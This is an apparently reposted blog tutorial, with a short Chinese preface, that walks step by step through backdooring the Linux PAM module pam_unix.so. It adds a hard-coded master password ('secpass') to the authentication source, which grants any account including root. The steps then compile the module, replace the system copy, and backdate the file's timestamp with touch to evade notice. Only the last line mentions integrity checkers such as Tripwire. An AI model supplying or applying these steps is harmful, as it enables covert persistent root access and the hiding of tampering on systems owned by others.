|
来源:http://hi.baidu.com/p3rlish/blog ... c64a5d4ec22640.html
这个东西,08年的时候某牛给我讲解过一次,不过没这么通俗易懂,今天看到之后发现这个写的还是不错的,分享一下
In this article I will show you how to modify the PAM module pam_unix.so to let us log on a system (Via SSH per example) using a master password, which can be used with every login on the box.
1. Download PAM Source
ftp://ftp.kernel.org/pub/linux/l ... ux-PAM-1.1.1.tar.gz
2. Unzip and edit the source file we are interested (pam_unix_auth.c)
tar -xvzf Linux-PAM-1.1.1.tar.gz
pico Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c
3. Search in the file the next string
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
4. Just after these lines add the next piece of code
if (strcmp(p,”secpass”)==0 ){retval = PAM_SUCCESS;}
Where secpass is the second password (our secret password). With this modification every login with a valid user on the system will accept this password ( root inclusive).
5. Go to the main source directory to configure and compile
./configure
make
This create our needed module in modules/pam_unix/.libs/pam_unix.so
6.Now we need to replace the old module with the new one. But before we will create a backup in case we need it later.
cp /lib/security/pam_unix.so /lib/security/pam_unix.so.orig
cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so
7. Test if it works. You can create a new SSH session to the system.
8. Something important to take into consideration is change the file’s modification date.We can do it with touch.
touch -t 200901022110 pam_unix.so
Following these steps you could have an alternative way to enter a system.
That’s why its so important to use a integrity checker on the system (like Tripwire).
|
|